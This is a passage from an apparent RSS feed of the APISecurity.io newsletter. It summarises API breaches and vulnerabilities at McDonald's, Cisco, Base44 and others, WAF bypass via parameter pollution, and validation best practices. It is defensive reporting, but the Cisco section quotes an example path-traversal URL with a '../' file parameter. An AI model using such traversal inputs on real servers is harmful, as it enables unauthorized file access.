<p><span style="font-weight: 400;">On the integration side, the clearer and more precise an API is designed and documented, the easier it is for AI agents to automatically discover and use it. This is true for all API consumers, but it is particularly critical when working with probabilistic AI systems, where small ambiguities in design can cause major integration and usage issues.</span></p>
<p><span style="font-weight: 400;">This Nordic APIs’ </span><a href="https://nordicapis.com/designing-api-error-messages-for-ai-agents/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> highlights how well-structured error messages play a role in making APIs more usable for AI agents. Standardizing API response codes, message structures, and semantics can go a long way to making APIs AI-ready and improve “agent experience” (you definitely don’t want to upset those agents!).</span></p>
<p><span style="font-weight: 400;">Great article, and worth a read.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: API bug provides more free McNuggests</span></h2>
<p><span style="font-weight: 400;">API vulnerabilities have been reported in a number of McDonald’s apps and platforms by a security researcher in a detailed </span><a href="https://bobdahacker.com/blog/mcdonalds-security-vulnerabilities" target="_blank" rel="noopener"><span style="font-weight: 400;">blog post.</span></a></p>
<p><span style="font-weight: 400;">This is the third API security incident involving McDonald’s covered in 2025. In Issue 276 (July), we reported a vulnerability in McDonald’s recruitment platform that allowed unauthorized API access. Earlier, in Issue 262 (January), similar flaws in McDonald’s online order and delivery system let anyone modify other customers’ orders.</span></p>
<p><span style="font-weight: 400;">In this latest case, a McDonald’s app rewards users with free McNuggets based on their reward points. The researcher found that the Web app only validated points on the client side. By bypassing the client and sending requests directly to the API, which didn’t enforce the same checks, users could claim free McNuggets without any points.</span></p>
<p><span style="font-weight: 400;">Other flaws identified include:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><b>API2:2023 – Broken Authentication:</b><span style="font-weight: 400;"> APIs missing authentication allowed attackers to overwrite corporate data.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>API3:2023 Broken Object Property Level Authorization:</b><span style="font-weight: 400;"> Arbitrary data could be inserted into food order API requests.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>API4:2023 – Unrestricted Resource Consumption:</b><span style="font-weight: 400;"> “New member” coupons, intended for one-time use, could be reused indefinitely via direct API calls.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>API5:2023 – Broken Functional Level Authorization:</b><span style="font-weight: 400;"> Regular users could access administrator-level services and sensitive information.</span></li>
</ul>
<p><span style="font-weight: 400;">If that list looks familiar, take another look at the Intel API case from earlier. Again, there are clear parallels in the types of API vulnerabilities that occur often across teams and industries.</span></p>
<p><span style="font-weight: 400;">Notably, while investigating these vulnerabilities, the researcher temporarily modified private resources and recruited a friend, a McDonald’s employee, to test whether a regular crew member could access privileged systems. According to the blog post, the employee was later terminated by McDonald’s. Perhaps stretching the bounds of responsible hacking?</span></p>
<p>The post <a href="https://apisecurity.io/issue-278-owasp-api-bugs-at-intel-teaforher-mcdonalds-optus-breach-fallout-apis-for-ai-agents/">Issue 278: OWASP API Bugs at Intel, TeaForHer, &#038; McDonald’s, Optus Breach Fallout, APIs for AI Agents</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 277: Hacking WAFs, AI benefits and risks, AI-ready with OpenAPI, Developers exposed</title>
		<link>https://apisecurity.io/issue-277-hacking-wafs-ai-benefits-and-risks-ai-ready-with-openapi-developers-exposed/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 07 Aug 2025 12:34:02 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[API vulnerabilities]]></category>
		<category><![CDATA[GenAI]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11356</guid>

					<description><![CDATA[<p>This week, we cover the promise and pitfalls of using AI for API security, along with newly discovered vulnerabilities in Web Application Firewalls and emerging Vibe Coding platforms. We explore strategies for building APIs optimized for AI integration, and highlight a critical vulnerability in a popular API development framework that developers should be aware of. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-277-hacking-wafs-ai-benefits-and-risks-ai-ready-with-openapi-developers-exposed/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-277-hacking-wafs-ai-benefits-and-risks-ai-ready-with-openapi-developers-exposed/">Issue 277: Hacking WAFs, AI benefits and risks, AI-ready with OpenAPI, Developers exposed</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we cover the promise and pitfalls of using AI for API security, along with newly discovered vulnerabilities in Web Application Firewalls and emerging Vibe Coding platforms. We explore strategies for building APIs optimized for AI integration, and highlight a critical vulnerability in a popular API development framework that developers should be aware of.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: WAF security hacked by HTTP parameter pollution </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Researchers at Ethiack </span><a href="https://blog.ethiack.com/blog/bypassing-wafs-for-fun-and-js-injection-with-parameter-pollution" target="_blank" rel="noopener"><span style="font-weight: 400;">uncovered</span></a><span style="font-weight: 400;"> security bypass vulnerabilities in a number of WAF products, demonstrating a cross-site scripting attack using a relatively simple technique to bypass WAF security. ‘HTTP parameter pollution’ exploits the fact that some application technologies interpret duplicate parameters in different ways:</span><span style="font-weight: 400;"><br />
</span></p>
<p style="font-weight: 400; text-align: center;"><span style="font-weight: 400;">&#8216;https:\//example.com/path?</span><b>myParam</b><span style="font-weight: 400;">=val1&amp;</span><b>myParam</b><span style="font-weight: 400;">=val2&#8242; </span><span style="font-weight: 400;"><br />
</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For example, an ASP.net application automatically combines the values from a duplicate parameter as a comma separated list or array:</span></p>
<p style="font-weight: 400; text-align: center;"><b>myParam</b><span style="font-weight: 400;">=val1,val2</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Hackers can use this feature to break a cross-site scripting (XSS) attack pattern into multiple pieces in order to obfuscate the full attack pattern.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The team found that while WAFs will recognize the malicious pattern in its entirety, if the pattern is spread across multiple input parameters most WAFs fail to recognize the risk and allow the malicious request through to the server, where it is combined back into the full attack pattern.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a tricky attack to prevent for APIs, and clearly most WAFs aren’t up to the task. But the ambiguity around duplicate parameters can be removed by defining up-front a parameter’s data type, to clarify that it is not a list of array of values and so should only appear once in a request. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Or If the API does need to support multiple parameter values as an array, best to set further constraints on the parameter values, to limit the room for hackers to smuggle through scripts, commands and other invalid input in a parameter pollution attack. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One to watch out for!</span></p>
<h2><span style="font-weight: 400;">Article: API Security &#8211; guided by tools but driven by expertise</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">This </span><a href="https://dzone.com/articles/secure-transaction-api-fintech-github-copilot" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> outlines a good example of how developers can use AI tools effectively to produce secure APIs. A combination of a developer’s domain knowledge guiding an AI tool to automatically add the appropriate security controls in the API code, rather than trying to offload security expertise to AI.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">While the article focuses on building secure APIs for the Fintech industry, this really should be recommended practice for any secure API development.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">First the article makes a great case for API security fundamentals: validate all inputs against strict rules, enforce rate limits to prevent abuse, and handle errors without leaking details. These are solid security recommendations, since they help build-in API resilience to common attacks. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Next, the developer leverages an AI tool, GitHub Copilot in this case, to enrich the API code with the security controls, but with the critical eye of an experienced practitioner to watch for AI mistakes.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">“A basic security check was performed using the prompt generated by Copilot&#8217;s code. However, we need to implement a more robust error handling check to enhance security.”</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">An interesting article and worth a read.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: API flaws in Base44’s vibe coding platform</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Reports of vulnerabilities in AI agents, LLMs, and especially MCP solutions have surged in recent months. As with many emerging technologies, the rush to deploy AI-powered tools and integrations has often outpaced security considerations.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The latest example comes from Wiz researchers, who </span><a href="https://www.wiz.io/blog/critical-vulnerability-base44" target="_blank" rel="noopener"><span style="font-weight: 400;">discovered</span></a><span style="font-weight: 400;"> critical API vulnerabilities in the Base44 vibe coding platform, a tool used by enterprises to build applications with the help of AI. Despite offering access control features that allow organizations to restrict application usage to invited users only, researchers found that the platform’s APIs allowed anyone to self-register for any hosted application.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The only requirement was an application ID, which was easily discoverable even for private enterprise applications. This bypassed access controls entirely, exposing private applications and potentially sensitive data to unauthorized access.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Authorization flaws remain one of the most common and dangerous vulnerabilities in API development. As AI-driven platforms become more widely adopted, they must be held to the same security standards as any production system.</span></p>
<h2><span style="font-weight: 400;">Article: Define APIs with precision for AI integration </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><i><span style="font-weight: 400;">New Stack</span></i> <a href="https://thenewstack.io/how-agentic-ai-is-reshaping-api-self-discovery/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> explores how agentic AI systems discover and call APIs autonomously. There are some useful API design tips here that apply beyond AI clients, but are particularly relevant and important for autonomous systems, to limit the room for integration errors or malicious attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The key message from the article is that vague or loosely defined APIs lead to unexpected behavior from both the calling agent and the API itself.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Without the precision of clear endpoint names, parameter constraints, and schemas, agents can either misuse input fields or misinterpret responses, causing unintended API behaviours.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some recommendations to make APIs AI-ready include:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Publish a well-defined OpenAPI contract with complete request/response schemas, parameter constraints, authentication schemes, error formats, and success codes. Agents can rely on that spec as a source of truth.</span><span style="font-weight: 400;"><br />
</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Add rich, natural‑language descriptions at both API and operation levels. Include business intent and context, and relevant examples that help agents choose endpoints correctly.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">High‑quality OpenAPI contracts are essential to clarify how APIs work, for consistent interpretation by clients, especially autonomous agents, and reduce risks of misuse, hallucinations, or unpredictable API behavior. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: API developers exposed to attacks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Developers are already under pressure to secure production APIs, but now their local development environments are becoming attack surfaces too. </span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">According to recent </span><a href="https://gbhackers.com/nestjs-vulnerability-allows-code-execution/" target="_blank" rel="noopener"><span style="font-weight: 400;">reports</span></a><span style="font-weight: 400;">, a package from the popular Next.js framework contained a critical flaw that allowed remote code execution (RCE) attacks against the developer’s environment.  </span></p>
<blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">“it exposes a local HTTP server with an API endpoint at /inspector/graph/interact that accepts and executes JavaScript code within an unsafe sandbox environment”</span></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">Attackers could send commands to launch applications on the developer’s local machine and potentially steal sensitive data.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A key issue was the failure to validate the Origin header in a request, which tells the API server where the request came from, allowing it to verify the legitimacy of requests and to enforce CORS protections. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Without verifying it against a trusted list, the server accepted requests from any source, bypassing CORS protections and enabling exploitation from malicious origins.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The case highlights key lessons: always apply strict validation to headers like Origin and Content-Type, and keep software dependencies updated to avoid known vulnerabilities.</span></p>
<p>The post <a href="https://apisecurity.io/issue-277-hacking-wafs-ai-benefits-and-risks-ai-ready-with-openapi-developers-exposed/">Issue 277: Hacking WAFs, AI benefits and risks, AI-ready with OpenAPI, Developers exposed</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 276: API discovery hype, BOLA at McDonalds, Cisco APIs exploited, input validation best practices</title>
		<link>https://apisecurity.io/issue-276-api-discovery-hype-bola-at-mcdonalds-cisco-apis-exploited-input-validation-best-practices/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 24 Jul 2025 11:03:00 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[API Breaches]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[API vulnerabilities]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11348</guid>

					<description><![CDATA[<p>This week, we’re sharing two articles focused on input validation best practices, exploring how weak validation can leave APIs exposed. We also take a closer look at some recent claims about API discovery that risk distracting from real security issues, plus a review of recent API security incidents reported at McDonald’s and Cisco. Article: How [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-276-api-discovery-hype-bola-at-mcdonalds-cisco-apis-exploited-input-validation-best-practices/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-276-api-discovery-hype-bola-at-mcdonalds-cisco-apis-exploited-input-validation-best-practices/">Issue 276: API discovery hype, BOLA at McDonalds, Cisco APIs exploited, input validation best practices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we’re sharing two articles focused on input validation best practices, exploring how weak validation can leave APIs exposed. We also take a closer look at some recent claims about API discovery that risk distracting from real security issues, plus a review of recent API security incidents reported at McDonald’s and Cisco.</p>
<h2><span style="font-weight: 400;">Article: How Discovery Hype Is Undermining API Security</span></h2>
<p>An <a href="https://securityboulevard.com/2025/07/api-sprawl-can-trip-up-your-security-big-time" target="_blank" rel="noopener">article</a> on API sprawl highlights real risks that emerge when API governance policies aren’t enforced. But a misleading claim about “discovery” really stands out:</p>
<blockquote><p>“API security is never the problem, it is always the discovery. Once you’ve discovered it, you’ll fix it.”</p></blockquote>
<p>If only that were true. Unfortunately, decades of experience prove the opposite.</p>
<p>In reality, most API breaches involve known APIs that were simply not properly secured. And the persistent factors driving these failures are a <strong>lack of secure development skills and under-resourced security teams.</strong></p>
<p>For instance, OWASP API Security Top 10 issues like BOLA and mass assignment are hard to prevent without secure coding awareness, and hard to detect without dedicated AppSec involvement and targeted testing. These are not “discovery” problems; they are <strong>design, development, and validation</strong> problems.</p>
<p>To be clear, for teams that have lacked strong API governance in the past, discovery can be a useful recovery tool to bring unmanaged APIs into scope. However, discovery by no means guarantees security, and sweeping statements like “API security is never the problem” risks downplaying the real effort required to secure APIs, and giving teams a false sense of progress.</p>
<h2><span style="font-weight: 400;">Vulnerability: Another API BOLA at McDonald’s</span></h2>
<p>Researchers Ian Carroll and Sam Curry published a new <a href="https://ian.sh/mcdonalds" target="_blank" rel="noopener">report</a> detailing API vulnerabilities in a chatbot-based recruitment platform used by 90% of McDonald’s franchises.</p>
<p>They first gained admin access to a test account via weak credentials (username: 123456, password: 123456). From there, they began probing the platform’s APIs, which returned data on job candidates.</p>
<p>By simply decrementing a candidate ID in API requests, they were able to access real candidate information across McDonald’s franchises. The API relied on predictable IDs (classic IDOR) and failed to enforce authorization, allowing a test account to retrieve production data. Broken Object Level Authorization (BOLA) is number one on the OWASP API Security Top 10 and a common cause of API breaches.</p>
<p>Notably, this isn&#8217;t McDonald’s first BOLA exposure. In Issue 262, we covered a McDonald’s API that allowed researchers to modify other customers’ McNugget orders: “<a href="https://apisecurity.io/issue-262-api-incidents-in-invoice-ninja-mcdonalds-truecaller-apps-jetbrains-survey-postman-data-leaks/" target="_blank" rel="noopener">Unauthorized API access to McNuggets</a>”.</p>
<p>These recurring BOLA flaws reinforce the need to enforce <strong>authorization checks at the object level</strong>. Without secure coding practices and robust API authorization testing, the same vulnerabilities will continue to be exploited.</p>
<h2><span style="font-weight: 400;">Article: Blocking API Attacks with Input Validation</span></h2>
<p>API vulnerabilities can exist at many layers of the stack, but most vulnerabilities are ultimately exploited through the API request.</p>
<p>For example, common API attacks involve:</p>
<ul>
<li>Malicious injection patterns in HTTP headers<br />
Use of invalid or stolen access credentials<br />
Input properties deliberately crafted to break or exploit API logic</li>
</ul>
<p>An <strong>allow-list approach to input validation</strong> can significantly reduce this attack surface by restricting inputs to the strict requirements of the underlying service. For example, if an API expects a user-supplied UUID, it should immediately reject anything that isn’t a valid UUID.</p>
<p>A recent NordicAPI’s <a href="https://nordicapis.com/why-input-validation-for-apis-matters-in-the-ai-age/" target="_blank" rel="noopener">article</a> highlights this best practice, sharing real-world examples, some of which we’ve also covered in previous issues, demonstrating how input validation can block API attacks to prevent serious breaches and data leaks.</p>
<p>Worth a read.</p>
<h2><span style="font-weight: 400;">Breach: Weak Input Validation Exposes Cisco APIs</span></h2>
<p>Multiple critical API vulnerabilities have been discovered in Cisco’s Identity Services Engine (ISE) that are now actively under attack. These API flaws stem from insufficient input validation, allowing unauthenticated attackers to upload and execute arbitrary files or code as the root user.</p>
<p>Cisco’s <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-rce-ZAd2GnJ6" target="_blank" rel="noopener">advisory</a> suggests that at least one of the API flaws exposes a path traversal vulnerability:</p>
<p>&#8220;This vulnerability is due to a lack of file validation checks that would prevent uploaded files from being placed in privileged directories on an affected system.&#8221;</p>
<p><a href="https://owasp.org/www-community/attacks/Path_Traversal" target="_blank" rel="noopener">Path traversal</a> allows an attacker to force an API to place files in unintended and potentially sensitive locations on the server. For example, an attacker could exploit a vulnerable endpoint using a URL like:</p>
<p><strong><span style="color: #339966;">http://some_site.com.br/get-files?file=../../../../some dir/some file</span></strong></p>
<p>The Cisco ISE platform is used to manage access control for enterprise networks, meaning these API vulnerabilities pose a serious risk to the security and integrity of business-critical resources, and highlights again the importance of <strong>robust input validation and secure coding practices</strong> when designing and deploying APIs.</p>
<h2><span style="font-weight: 400;">Article: Tightening the first line of defense</span></h2>
<p>In a <a href="https://hackernoon.com/bad-validation-is-breeding-security-nightmares-in-nestjs" target="_blank" rel="noopener">post</a> on the Hackernoon website, a developer shares his experiences from working on legacy NestJS projects and the risks exposed through poor data validation in the code.</p>
<p>Any validation is better than no validation, but loose validation can still expose software to a range of different attack vectors such as SQL injection and path traversal attacks, not to mention subtle business logic attacks that are more difficult to discern through content inspection.</p>
<p>The writer shares an example of the classic “isString()” validation check, which, while useful, still leaves hackers with plenty of room to test and probe software for vulnerabilities.</p>
<p>This underscores the need for solid input validation, not just checking types, but enforcing additional constraints like length, format, patterns, and value ranges. For APIs the OpenAPI format provides a standard way to define data constraints up front in an API contract,</p>
<p>The contract then acts as a blueprint: developers use it to build proper validation into the API, and security teams use it to test whether those validations are actually enforced. It’s a simple way to catch invalid input and keep APIs tight, predictable, and secure.</p>
<h2><span style="font-weight: 400;">Industry Event: Black Hat USA</span></h2>
<p>Next month, all cybersecurity roads lead to the Black Hat USA event in Las Vegas. If you are attending the event this year, be sure to visit the 42Crunch booth (#1967) where our team will be on hand to answer all your API security-related questions. If you would like to book some time with the 42Crunch team, simply <a href="https://42crunch.com/book-a-meeting-api-security-expert/" target="_blank" rel="noopener">reserve a slot here</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-276-api-discovery-hype-bola-at-mcdonalds-cisco-apis-exploited-input-validation-best-practices/">Issue 276: API discovery hype, BOLA at McDonalds, Cisco APIs exploited, input validation best practices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 275: API hackers strike gold, Malicious API drift at CoinMarketCap, Survey reveals major API security gaps</title>
		<link>https://apisecurity.io/issue-275-api-hackers-strike-gold-malicious-api-drift-at-coinmarketcap-survey-reveals-major-api-security-gaps/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 03 Jul 2025 14:48:58 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[API Breaches]]></category>
		<category><![CDATA[API Drift]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[JWT]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11339</guid>

					<description><![CDATA[<p>This week, our theme is “how secure is your API security?”. We highlight two recent attacks targeting major financial platforms, along with a new industry survey that exposes significant gaps in API security practices. We also explore technical deep-dives into vulnerabilities such as JWT flaws and host header injection attacks. Plus, we share details on [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-275-api-hackers-strike-gold-malicious-api-drift-at-coinmarketcap-survey-reveals-major-api-security-gaps/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-275-api-hackers-strike-gold-malicious-api-drift-at-coinmarketcap-survey-reveals-major-api-security-gaps/">Issue 275: API hackers strike gold, Malicious API drift at CoinMarketCap, Survey reveals major API security gaps</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, our theme is “</span><b>how secure is your API security?”</b><span style="font-weight: 400;">. We highlight two recent attacks targeting major financial platforms, along with a new industry survey that exposes significant gaps in API security practices. We also explore technical deep-dives into vulnerabilities such as </span><b>JWT flaws</b><span style="font-weight: 400;"> and </span><b>host header injection attacks</b><span style="font-weight: 400;">. Plus, we share details on an upcoming API security unconference happening this October in Stockholm.</span></p>
<h2><span style="font-weight: 400;">Breach: Popular Indian Gold Trading Platform Hacked</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A well-known digital platform for buying and selling gold in India has suffered a significant security breach, enabling attackers to gain unauthorized access to sell customers’ digital gold holdings. According to multiple Indian </span><a href="https://vygrnews.com/business/hacker-strikes-aditya-birla-app--how-%E2%82%B91-95-crore-in-digital-gold-vanished-overnight" target="_blank" rel="noopener"><span style="font-weight: 400;">news outlets</span></a><span style="font-weight: 400;">, this breach at Aditya Birla Capital Digital Limited (ABCD) was traced to vulnerabilities in the company’s APIs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">“This flaw allowed the hacker to bypass security protocols, access user accounts, sell their digital gold holdings, and transfer the proceeds to various personal bank accounts”</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Although the latest reports haven’t yet shared specifics of the API vulnerability, they confirm that attackers managed to circumvent an additional layer of protection: a one-time password (OTP) sent to the target users’ registered device.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This detail is similar to a case we covered in </span><a href="https://apisecurity.io/issue-272-volkswagen-api-hacked-api-flaws-in-instagram-tiktok-eli-attacks-radware-cisco-api-vulnerabilities/" target="_blank" rel="noopener"><span style="font-weight: 400;">issue 272</span></a><span style="font-weight: 400;"> of </span><i><span style="font-weight: 400;">APISecurity.io</span></i><span style="font-weight: 400;">, where a vulnerability in Volkswagen’s API also exposed OTPs and compromised user data.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These breaches highlight that having security controls in place isn’t enough. Organizations must rigorously assess the strength, implementation, and reliability of those controls, as API attackers are increasingly targeting the weakest links in authentication and authorization flows.</span></p>
<h2><span style="font-weight: 400;">Report: Critical API Security Gaps at 84% of Companies </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://www.raidiam.com/download-api-security-report" target="_blank" rel="noopener"><span style="font-weight: 400;">survey</span></a><span style="font-weight: 400;"> by Raidiam reveals critical deficiencies in API security across a range of organizations. The report evaluates each company’s API security posture relative to the sensitivity of the data their APIs expose, such as personal or payment-related information.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This survey focuses on companies that are </span><i><span style="font-weight: 400;">not</span></i><span style="font-weight: 400;"> subject to strict regulatory frameworks like Open Banking. In other words, it spotlights how organizations manage API security when they’re left to define their own standards. While most companies had some API security controls in place, the findings are hardly encouraging:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Widespread use of weak or insecure API authentication methods</span>&nbsp;</li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Lack of fine-grained authorization, leading to over-privileged access</span>&nbsp;</li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Insufficient or nonexistent API security testing</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Of the 68 companies assessed, 57 (84%) were classified as needing to &#8220;Act Urgently&#8221;, meaning their current API security practices are inadequate for the sensitivity of the data they handle.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The survey results underscore our key question: </span><b>how secure is your API security, really?</b><span style="font-weight: 400;"> </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Weak JWTs Expose the Manufacturing Sector</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A </span><a href="https://www.securityweek.com/critical-microsens-product-flaws-allow-hackers-to-go-from-zero-to-hero/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> in SecurityWeek describes critical vulnerabilities in Microsens’s NMP Web+ product, used worldwide in the manufacturing sector. The vulnerabilities allowed unauthenticated attackers to forge JWTs and gain admin access. Among the issues: use of static JWT secrets and tokens with no expiration. These flaws enabled attackers to bypass authentication entirely and maintain indefinite access, making it a textbook example of how poor access token implementation can undermine an entire security model.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These types of JWT weaknesses are common targets for attackers. For instance, </span><a href="https://apisecurity.io/issue-274-authorization-nightmares-api-security-case-studies-23andme-fined-2-3m-oauth-for-cloud-native-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">issue 274</span></a><span style="font-weight: 400;"> detailed a similar case involving an unprotected payments API exposed through weak JWT validation (“Case Study: JWT Validation &amp; Unauthorized Payments”).</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">API protection security policies should enforce robust JWT practices. At a minimum, ensure:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Secrets are rotated and never hardcoded.</span><span style="font-weight: 400;"><br />
</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Short-lived tokens with strict expiration are enforced.</span><span style="font-weight: 400;"><br />
</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">All JWT claims and algorithms are validated.</span><span style="font-weight: 400;"><br />
</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">API Tokens and requests that fail any part of the policy are rejected outright.</span></li>
</ul>
<h2><span style="font-weight: 400;">Vulnerability: How to Avoid Password Reset Poisoning</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Security researchers and ethical hackers provide a valuable service to the API community by uncovering real-world vulnerabilities and helping developers understand how to avoid them. On that note, this detailed </span><a href="https://infosecwriteups.com/how-i-hacked-accounts-using-host-header-injection-in-password-reset-link-2774431eed89" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> by researcher </span><b>Pratik Dabhi</b><span style="font-weight: 400;"> is well worth a read.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Continuing our theme of </span><i><span style="font-weight: 400;">&#8220;how secure is the security?&#8221;</span></i><span style="font-weight: 400;">, Pratik explores flaws in password reset functionality. Most apps and websites offer this feature to help users safely recover access to an account. But as this case shows, a weak implementation can become a backdoor for attackers.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">By probing the application and its related endpoints, Pratik discovered a way to manipulate the system into generating a malicious password reset link, using the host header in a request.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Input validation, especially for data-rich APIs, often focuses on validating request bodies or URL parameters, often used as a vehicle for injection attacks. But this case is a reminder that headers can also carry risk from malicious input, and so should be considered untrusted and carefully validated. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A great write-up that might encourage urgent code reviews and security testing!</span></p>
<h2><span style="font-weight: 400;">Breach: API Drift with Malicious Intent for CoinMarketCap</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">When a third-party API changes unexpectedly, it can break consuming applications or websites relying on specific media types or response formats. But broken functionality will be the least of your concerns when API changes are driven by malicious intent.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent API incident involving the cryptocurrency group CoinMarketCap is a perfect example of the risks from unsafe API consumption, highlighted in </span><a href="https://owasp.org/API-Security/editions/2023/en/0xaa-unsafe-consumption-of-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">OWASP API10:2023</span></a><span style="font-weight: 400;">. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">GBHackers </span><a href="https://gbhackers.com/coinmarketcap-doodle-image-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">reports</span></a><span style="font-weight: 400;"> that CoinMarketCap used an API to dynamically pull a doodle image for its homepage, but attackers modified the API response to serve a malicious JSON payload instead. The response included JavaScript that ended up embedded on the CoinMarketCap site, tricking users into sharing details about their crypto wallets.</span></p>
